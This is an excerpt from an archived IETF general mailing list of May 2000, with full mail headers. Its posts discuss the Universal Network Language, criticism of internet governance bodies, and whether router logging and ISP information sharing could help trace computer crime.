logical expressions, without ambiguity.
These expressions are not for humans to
read, but for computers.'
(2)
http://www.unl.ias.unu.edu/publications/gm/unlsys/sys-03.htm
states that:
`it is proposed that the description format for
UNL expression is considered as an extension of HTML convention.'
Hope this helps,
Jean-Paul Jeral
ISIS/RIT/WT
EC JRC Ispra.
>From owner-ietf-outbound Tue May 23 11:02:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA04568
for [EMAIL PROTECTED]; Tue, 23 May 2000 11:00:02 -0400 (EDT)
Received: from mailer1.lut.ac.uk (mailer1.lut.ac.uk [158.125.1.202])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA04440
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 10:53:04 -0400 (EDT)
Received: from jon (helo=localhost)
by mailer1.lut.ac.uk with local-smtp (Exim 2.10 #1)
id 12uG31-0000h3-00; Tue, 23 May 2000 15:52:43 +0100
Date: Tue, 23 May 2000 15:52:42 +0100 (BST)
From: Jon Knight <[EMAIL PROTECTED]>
X-Sender: jon@mailer1
To: Jean-Paul Jeral <[EMAIL PROTECTED]>
cc: Fred Baker <[EMAIL PROTECTED]>, Anders Feder <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Subject: Re: Universal Network Language
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <Pine.SOL.3.96.1000523155148.23361A-100000@mailer1>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Lboro-Filtered: mailer1.lut.ac.uk, Tue, 23 May 2000 15:52:43 +0100
X-Loop: [EMAIL PROTECTED]
On Tue, 23 May 2000, Jean-Paul Jeral wrote:
> (1)
> http://www.unl.ias.unu.edu/publications/gm/breaking/bre/brk-02.htm
> states that:
>
> `UNL represents sentences in the form of
> logical expressions, without ambiguity.
> These expressions are not for humans to
> read, but for computers.'
So is this a machine readable version of an Esperanto style human language
or something more like ANDF/UNCOL?
Tatty bye,
Jim'll
>From owner-ietf-outbound Tue May 23 11:40:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA05302
for [EMAIL PROTECTED]; Tue, 23 May 2000 11:40:02 -0400 (EDT)
Received: from scriba.org ([EMAIL PROTECTED] [208.178.122.40])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA05148
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 11:31:29 -0400 (EDT)
Received: from localhost (bob@localhost) by scriba.org (8.8.5/8.7.3) with ESMTP id
LAA31240 for <[EMAIL PROTECTED]>; Tue, 23 May 2000 11:31:11 -0400
Date: Tue, 23 May 2000 11:31:11 -0400 (EDT)
From: Bob Allisat <[EMAIL PROTECTED]>
X-Sender: bob@mansfield
To: [EMAIL PROTECTED]
Subject: IETF *is* computer crime.
Message-ID: <Pine.LNX.4.21.0005231110070.30390-100000@mansfield>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
The manner in which unsanctioned anti-democratic organizations
control what amounts to the global communications network is a
crime unto itself. Citizens utilizing this infra-structure posses
no legal protections, no constitutional safeguards and no basic
rights or liberties of any variety. We are subject to the chimeric
whims of technocrats lost in the clouds of their stock options,
fancy job titles and droll rotation of globe hopping symposiums
and conferences. Left with no protections we are virtually
helpless, hapless and hopeless.
The concept of privacy and personal rights and freedoms on the
net are fully nul and void. The whole convoluted mess rambles on
generating profits for the lever-controllers and box managers
and everything is fine and dandy. Except for the pervading fact
that bloody security, mechanical network integrity and smooth
technical functioning of the machinery do not supercede precious
inalienables and undeniables. Except for the truth that people
and their intercourses are openly, randomly and completely subject
to limitless interferances and interventions.
IETF, ISOC, ICANN, ITU and whatever other unsanctioned, informal
acretion of pseudo-authority should arise are no places to look
for solutions. They embody the problem. They ARE the proble. To
search elsewhere is our only alternative. Tou route around, to
undermine, to quietly innovate clever detours and innovations.
Because the moment the unchanging cast of central authorites
are deposed is the moment a solution becomes workable. Look no
further than your own self, your own capabilities and capacities.
Anyone who seeks freedom or solace from those who benifit the most
from our control and the maintenance of their influence can only
impede evolution.
Alive and very much well, all my opinions only, a very insignificant
observer among the masses of the great unplugged, I remain,
Bob Allisat
>From owner-ietf-outbound Tue May 23 13:50:45 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA07041
for [EMAIL PROTECTED]; Tue, 23 May 2000 13:50:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA07004
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 13:41:23 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id KAA13052;
Tue, 23 May 2000 10:41:18 -0700 (PDT)
Date: Tue, 23 May 2000 10:41:18 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
X-Loop: [EMAIL PROTECTED]
Jacob Palme <[EMAIL PROTECTED]> wrote:
> But would not better logg production in routers be an aid
> in finding the villain behind computer crimes?
What type of logging do you propose? It seems that the types of logging
that are already done enable people to trace the origins of suspicious
traffic.
--gregbo
>From owner-ietf-outbound Tue May 23 14:30:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA07603
for [EMAIL PROTECTED]; Tue, 23 May 2000 14:30:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA07564
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 14:28:41 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id LAA02219
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 11:28:10 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKMW2W>; Tue, 23 May 2000 18:20:49 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: IETF general mailing list <[EMAIL PROTECTED]>
Subject: RE: Should IETF do more to fight computer crime?
Date: Tue, 23 May 2000 18:27:41 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>Jacob Palme <[EMAIL PROTECTED]> wrote:
>
>> But would not better logg production in routers be an aid
>> in finding the villain behind computer crimes?
>
>What type of logging do you propose? It seems that the types
>of logging
>that are already done enable people to trace the origins of suspicious
>traffic.
>
>--gregbo
True, but only the origin of packets are determined. What is needed is
a code of ethics between ISPs , to share information.
i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
very rarely would isp1 be willing to disclose to isp2,...
which (user) is leased that specific dynamic ip address.
btw, this info would be required on the fly... so that net admin/sec
would be in a better position to pinpoint the perpetrator's habits/
physiological profile etc..
/pd
>From owner-ietf-outbound Tue May 23 15:20:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA08346
for [EMAIL PROTECTED]; Tue, 23 May 2000 15:20:02 -0400 (EDT)
Received: from moby.jaws.umn.edu ([EMAIL PROTECTED] [134.84.132.41])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA08283
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 15:15:31 -0400 (EDT)
Received: from phish.micro.umn.edu (phish.micro.umn.edu [134.84.134.52])
by moby.jaws.umn.edu (8.9.3/8.9.3) with ESMTP id OAA14818;
Tue, 23 May 2000 14:15:29 -0500 (CDT)
Received: (from iacovou@localhost)
by phish.micro.umn.edu (8.9.3/8.9.3) id OAA11219;
Tue, 23 May 2000 14:12:45 -0500 (CDT)
From: Danny Iacovou <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: IETF *is* computer crime.
To: [EMAIL PROTECTED] (Bob Allisat)
Date: Tue, 23 May 2000 14:12:44 -0500 (CDT)
Cc: [EMAIL PROTECTED]
In-Reply-To: <Pine.LNX.4.21.0005231110070.30390-100000@mansfield> from "Bob Allisat"
at May 23, 2000 11:31:11 AM
X-Favorite-Rooster: Foghorn Leghorn
X-Mailer: ELM [version 2.5 PL3]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hello Bob,
I think you are being too harsh on the IETF, ISOC, ICANN, ITU, and
"whatever other unsanctioned, informal acretion of pseudo-authorities
should arise".
As an example, a group of people decided to coordinate efforts in order
to communicate with each other. They agreed on a format for the
correspondance, and they agreed on a delivery protocol. Before you know
it, email is born. Such efforts are a good thing. By agreeing with each
other on the mechanics of such a transaction we've enabled the transaction
to occur (aside from actual implementation).
What wasn't agreed on? Well, one thing not agreed on is what to do if
correspondance is sent 'anonymously', containing material that may be of
interest to some authority of law, in some country (not even connected to
the 'Net at the time email is "standardized").
And of course this is but one possible scenerio not accounted for by
the standard describing format and delivery of one particular type
of electronic correspondance. But the standard never tried to address
any issues it didn't address - it is complete in what it is. That isn't
anyone's fault, is it? technologists are technologists, not students of
international law.
The goal of the IETF is to get us from point A to point B. It isn't to
get us from point A to point B with no shit (for lack of a better word)
in our way.
--------------------------------------------------------------------------------
Neophytos Iacovou University of Minnesota
Academic & Distributed Computing Services 100 Union St. SE
email: [EMAIL PROTECTED] Minneapolis, MN 55455 USA
>From owner-ietf-outbound Tue May 23 16:20:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA09077
for [EMAIL PROTECTED]; Tue, 23 May 2000 16:20:01 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA09004
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 16:13:34 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id OAA10688
for [EMAIL PROTECTED] env-from <vjs>;
Tue, 23 May 2000 14:13:34 -0600 (MDT)
Date: Tue, 23 May 2000 14:13:34 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Should IETF do more to fight computer crime?
X-Loop: [EMAIL PROTECTED]
> From: "Dawson, Peter D" <[EMAIL PROTECTED]>
> >Jacob Palme <[EMAIL PROTECTED]> wrote:
> >
> >> But would not better logg production in routers be an aid
> >> in finding the villain behind computer crimes?
> >
> >What type of logging do you propose? It seems that the types
> >of logging
> >that are already done enable people to trace the origins of suspicious
> >traffic.
> >
> >--gregbo
> True, but only the origin of packets are determined. What is needed is
> a code of ethics between ISPs , to share information.
> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
> very rarely would isp1 be willing to disclose to isp2,...
> which (user) is leased that specific dynamic ip address.
>
> btw, this info would be required on the fly... so that net admin/sec
> would be in a better position to pinpoint the perpetrator's habits/
> physiological profile etc..
Let's actually think for a moment about serious logging or sharing
information about Internet traffic. State of the art large routers
move Tbits/sec. If the average packet size is 500 bytes, you're
talking about logging or sharing information about 100 Mpackets/second.
If you only log or share the source and destination IPv4 addresses,
TCP or UDP port numbers, in incoming interface, a timestamp, and 1 or
2 bits saying the packet was not unusual (e.g. no TCP options other
than window scaling or SAK and no IP options), you're talking about
logging or sharing more than 20 bytes/packet or a few GBytes/second/big
router. There are 86,400 seconds/day, so you're talking about logging
or sharing about 100 TBytes/day per large router.
Typical IP paths seem to be at least 10 hops long these days, and
often 20 or 30. Most of those routers are not going to be Tbit/sec
backbone routers, but more than one will be, and the rest can be
counted or aggregated as if they were. Thus, you're talking about
logging or sharing several 1000 TBytes/day.
Perhaps it would not be a problem to burn 1,000,000 GByte CDROM, tapes,
or other media per day, but what would you be able to do with those logs?
Searching a 1000 TByte database on the fly, especially if it is merely
a primitive sequential log, would be a serious challenge.
Yes, not many Tbit routers have been deployed, but they will be, and I
think the average packet size is less than 500, which increases the amount
of logging. Yes, you might not need to keep those 1000's of TBytes for
more than a few days, but you still need a way to do something with them.
To put it another way, the complaints from the large ISP's that they cannot
police Internet traffic to shield their customers from pornography, talk
about World War II political parties, and the other things that various
pressure groups and governments dislike have some technical reality.
Technical reality always trumps political blather everywhere that matters.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Tue May 23 16:50:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA09463
for [EMAIL PROTECTED]; Tue, 23 May 2000 16:50:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA09397
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 16:46:09 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id NAA27290
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 13:45:39 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKMZ86>; Tue, 23 May 2000 20:38:18 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Should IETF do more to fight computer crime?
Date: Tue, 23 May 2000 20:45:09 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>-----Original Message-----
>From: Vernon Schryver [mailto:[EMAIL PROTECTED]]
>Sent: Tuesday, May 23, 2000 4:14 PM
>To: [EMAIL PROTECTED]
>Subject: RE: Should IETF do more to fight computer crime?
>
>
>> From: "Dawson, Peter D" <[EMAIL PROTECTED]>
>
>> >Jacob Palme <[EMAIL PROTECTED]> wrote:
>> >
>> >> But would not better logg production in routers be an aid
>> >> in finding the villain behind computer crimes?
>> >
>> >What type of logging do you propose? It seems that the types
>> >of logging
>> >that are already done enable people to trace the origins of
>suspicious
>> >traffic.
>> >
>> >--gregbo
>
>> True, but only the origin of packets are determined. What is
>needed is
>> a code of ethics between ISPs , to share information.
>> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
>> very rarely would isp1 be willing to disclose to isp2,...
>> which (user) is leased that specific dynamic ip address.
>>
>> btw, this info would be required on the fly... so that net admin/sec
>> would be in a better position to pinpoint the perpetrator's habits/
>> physiological profile etc..
>
>
>Let's actually think for a moment about serious logging or sharing
>information about Internet traffic. State of the art large routers
>move Tbits/sec. If the average packet size is 500 bytes, you're
>talking about logging or sharing information about 100 Mpackets/second.
>If you only log or share the source and destination IPv4 addresses,
>TCP or UDP port numbers, in incoming interface, a timestamp, and 1 or
>2 bits saying the packet was not unusual (e.g. no TCP options other
>than window scaling or SAK and no IP options), you're talking about
>logging or sharing more than 20 bytes/packet or a few GBytes/second/big
>router. There are 86,400 seconds/day, so you're talking about logging
>or sharing about 100 TBytes/day per large router.
>
>Typical IP paths seem to be at least 10 hops long these days, and
>often 20 or 30. Most of those routers are not going to be Tbit/sec
>backbone routers, but more than one will be, and the rest can be
>counted or aggregated as if they were. Thus, you're talking about
>logging or sharing several 1000 TBytes/day.
>
>Perhaps it would not be a problem to burn 1,000,000 GByte CDROM, tapes,
>or other media per day, but what would you be able to do with
>those logs?
>Searching a 1000 TByte database on the fly, especially if it is merely
>a primitive sequential log, would be a serious challenge.
>
>Yes, not many Tbit routers have been deployed, but they will be, and I
>think the average packet size is less than 500, which
>increases the amount
>of logging. Yes, you might not need to keep those 1000's of TBytes for
>more than a few days, but you still need a way to do something
>with them.
>
>To put it another way, the complaints from the large ISP's
>that they cannot
>police Internet traffic to shield their customers from
>pornography, talk
>about World War II political parties, and the other things that various
>pressure groups and governments dislike have some technical reality.
I agree on the technical reality of tbyte storage/tcpdump etc...
>
>Technical reality always trumps political blather everywhere
>that matters.
>
Yes, but if I were behind a DMZ and my IDS triggers... and if I got a
source address .. my question is...
would 'THe ISP' provide any type of information to negate the threat ? is
this a political problem?? , beyond technical reality or just plain
non-compliance to 'Collabration' ???
/pd
>From owner-ietf-outbound Tue May 23 17:20:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA09830
for [EMAIL PROTECTED]; Tue, 23 May 2000 17:20:03 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA09723
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 17:10:20 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4NLAJn28210;
Tue, 23 May 2000 17:10:19 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-reply-to: Your message of "Tue, 23 May 2000 18:27:41 -0000."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 23 May 2000 17:10:18 -0400
X-Loop: [EMAIL PROTECTED]
On Tue, 23 May 2000 18:27:41 -0000, "Dawson, Peter D" <[EMAIL PROTECTED]>
said:
> True, but only the origin of packets are determined. What is needed is
> a code of ethics between ISPs , to share information.
> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
> very rarely would isp1 be willing to disclose to isp2,...
> which (user) is leased that specific dynamic ip address.
Note that many providers may be legally bound to not give any more
information than "Yeah, that's one of our IP addresses". I know we
have a lot of issues regarding privacy laws due to the fact that we're
an agency of the Commonwealth of Virginia. If we find that one of our
students has been naughty, about all we can say to people outside is
that we're aware of it and that action is being taken as per our procedures.
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Tue May 23 17:30:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA09992
for [EMAIL PROTECTED]; Tue, 23 May 2000 17:30:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA09909
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 17:23:10 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id OAA03657
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 14:22:41 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKM5ZP>; Tue, 23 May 2000 21:15:20 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: IETF general mailing list <[EMAIL PROTECTED]>
Subject: RE: Should IETF do more to fight computer crime?
Date: Tue, 23 May 2000 21:22:11 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>On Tue, 23 May 2000 18:27:41 -0000, "Dawson, Peter D"
><[EMAIL PROTECTED]> said:
>> True, but only the origin of packets are determined. What is
>needed is
>> a code of ethics between ISPs , to share information.
>> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
>> very rarely would isp1 be willing to disclose to isp2,...
>> which (user) is leased that specific dynamic ip address.
>
>Note that many providers may be legally bound to not give any more
>information than "Yeah, that's one of our IP addresses". I know we
>have a lot of issues regarding privacy laws due to the fact that we're
>an agency of the Commonwealth of Virginia. If we find that one of our
>students has been naughty, about all we can say to people outside is
>that we're aware of it and that action is being taken as per
>our procedures.
>--
lets say a non-student was naughty and was attacking the vt.edu network...
would you feel satisfied with the answer.. "we're aware of it and that
action is being taken as per our procedures".... knowing fully well that
the outage costs is running into a couple of millions on a single site ??
/pd
>From owner-ietf-outbound Tue May 23 18:10:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA10458
for [EMAIL PROTECTED]; Tue, 23 May 2000 18:10:02 -0400 (EDT)
Received: from zmamail03.zma.compaq.com (zmamail03.zma.compaq.com [161.114.64.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA10397
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 18:01:13 -0400 (EDT)
Received: by zmamail03.zma.compaq.com (Postfix, from userid 12345)
id 12F22586; Tue, 23 May 2000 18:00:45 -0400 (EDT)
Received: from exchou-gh01.cca.cpqcorp.net (exchou-gh01.cca.cpqcorp.net
[16.110.248.201])
by zmamail03.zma.compaq.com (Postfix) with ESMTP id D2ED24B8
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 18:00:44 -0400 (EDT)
Received: by exchou-gh01.cca.cpqcorp.net with Internet Mail Service (5.5.2650.21)
id <LNZV8FCJ>; Tue, 23 May 2000 17:00:44 -0500
Message-ID: <[EMAIL PROTECTED]>
From: "Maddux, Michel" <[EMAIL PROTECTED]>
To: IETF general mailing list <[EMAIL PROTECTED]>
Subject: RE: Should IETF do more to fight computer crime?
Date: Tue, 23 May 2000 17:00:39 -0500
Return-Receipt-To: "Maddux, Michel" <[EMAIL PROTECTED]>
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain
X-Loop: [EMAIL PROTECTED]
When the procedures dictate that government agencies get involved at certain
points
and you notify them of the outage or problem, what other steps do you
recommend?
Operational entities are not, in most cases, law enforcement agencies.
There is a limit to
how much notification one should undertake in these situations.
thanks. /m.
> -----Original Message-----
> From: Dawson, Peter D [SMTP:[EMAIL PROTECTED]]
> Sent: Tuesday, May 23, 2000 3:22 PM
> To: IETF general mailing list
> Subject: RE: Should IETF do more to fight computer crime?
>
>
> >On Tue, 23 May 2000 18:27:41 -0000, "Dawson, Peter D"
> ><[EMAIL PROTECTED]> said:
> >> True, but only the origin of packets are determined. What is
> >needed is
> >> a code of ethics between ISPs , to share information.
> >> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
> >> very rarely would isp1 be willing to disclose to isp2,...
> >> which (user) is leased that specific dynamic ip address.
> >
> >Note that many providers may be legally bound to not give any more
> >information than "Yeah, that's one of our IP addresses". I know we
> >have a lot of issues regarding privacy laws due to the fact that we're
> >an agency of the Commonwealth of Virginia. If we find that one of our
> >students has been naughty, about all we can say to people outside is
> >that we're aware of it and that action is being taken as per
> >our procedures.
> >--
>
> lets say a non-student was naughty and was attacking the vt.edu network...
> would you feel satisfied with the answer.. "we're aware of it and that
> action is being taken as per our procedures".... knowing fully well that
> the outage costs is running into a couple of millions on a single site ??
> /pd
>From owner-ietf-outbound Tue May 23 18:20:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA11049
for [EMAIL PROTECTED]; Tue, 23 May 2000 18:20:02 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA10423
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 18:05:45 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id 363084CE07; Tue, 23 May 2000 18:05:42 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id SAA07440;
Tue, 23 May 2000 18:05:41 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 8C42F35DC2; Tue, 23 May 2000 18:05:35 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: "Dawson, Peter D" <[EMAIL PROTECTED]>,
IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 23 May 2000 18:05:35 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Valdis.Kletnieks@vt
.edu writes:
>On Tue, 23 May 2000 18:27:41 -0000, "Dawson, Peter D" <Dawson.Peter@emeryworld
>.com> said:
>> True, but only the origin of packets are determined. What is needed is
>> a code of ethics between ISPs , to share information.
>> i.e once a packet leaves isp1 cloud and travels across isp2 cloud,
>> very rarely would isp1 be willing to disclose to isp2,...
>> which (user) is leased that specific dynamic ip address.
>
>Note that many providers may be legally bound to not give any more
>information than "Yeah, that's one of our IP addresses". I know we
>have a lot of issues regarding privacy laws due to the fact that we're
>an agency of the Commonwealth of Virginia. If we find that one of our
>students has been naughty, about all we can say to people outside is
>that we're aware of it and that action is being taken as per our procedures.
Right. On the other hand, the AP reports that a French-government
sponsored bill would bar anonymous posting to the net. For details,
see
http://www.techserver.com/noframes/story/0,2294,500207446-500289602-501571097-0,00.html
--Steve Bellovin
>From owner-ietf-outbound Tue May 23 18:50:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA12488
for [EMAIL PROTECTED]; Tue, 23 May 2000 18:50:03 -0400 (EDT)
Received: from moby.jaws.umn.edu ([EMAIL PROTECTED] [134.84.132.41])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA12251
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 18:41:36 -0400 (EDT)
Received: from phish.micro.umn.edu (phish.micro.umn.edu [134.84.134.52])
by moby.jaws.umn.edu (8.9.3/8.9.3) with ESMTP id RAA22474;
Tue, 23 May 2000 17:41:37 -0500 (CDT)
Received: (from iacovou@localhost)
by phish.micro.umn.edu (8.9.3/8.9.3) id RAA14225;
Tue, 23 May 2000 17:38:51 -0500 (CDT)
From: Danny Iacovou <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
To: [EMAIL PROTECTED] (Steven M. Bellovin)
Date: Tue, 23 May 2000 17:38:50 -0500 (CDT)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED] (Dawson Peter D),
[EMAIL PROTECTED] (IETF general mailing list)
In-Reply-To: <[EMAIL PROTECTED]> from "Steven M.
Bellovin" at May 23, 2000 06:05:35 PM
X-Favorite-Rooster: Foghorn Leghorn
X-Mailer: ELM [version 2.5 PL3]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Steven M. Bellovin writes:
>
> Right. On the other hand, the AP reports that a French-government
> sponsored bill would bar anonymous posting to the net. For details,
> see
>http://www.techserver.com/noframes/story/0,2294,500207446-500289602-501571097-0,00.html
But should the IETF be fighting this fight? Does the IETF send someone
to France in hopes of convincing politicians not to do this? Do we have
the most convincing tongues? The strength of the IETF is in technology.
Right now we don't even have enough resources to go back and update
RFCs with augmented notes stating how popular implementations differ
from spec.
BTW: I'm not intending to pick on Mr. Bellovin.
--------------------------------------------------------------------------------
Neophytos Iacovou University of Minnesota
Academic & Distributed Computing Services 100 Union St. SE
email: [EMAIL PROTECTED] Minneapolis, MN 55455 USA
>From owner-ietf-outbound Tue May 23 19:30:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA13201
for [EMAIL PROTECTED]; Tue, 23 May 2000 19:30:02 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA13153
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 19:24:39 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id ECD8E1E005; Tue, 23 May 2000 19:24:38 -0400 (EDT)
Received: from smb.research.att.com (secure.research.att.com [135.207.25.14])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id TAA08479;
Tue, 23 May 2000 19:24:35 -0400 (EDT)
Received: from smb.research.att.com (localhost [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id A4CE335DC2; Tue, 23 May 2000 19:24:27 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Danny Iacovou <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED] (Dawson Peter D),
[EMAIL PROTECTED] (IETF general mailing list)
Subject: Re: Should IETF do more to fight computer crime?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 23 May 2000 19:24:26 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Danny Iacovou writes:
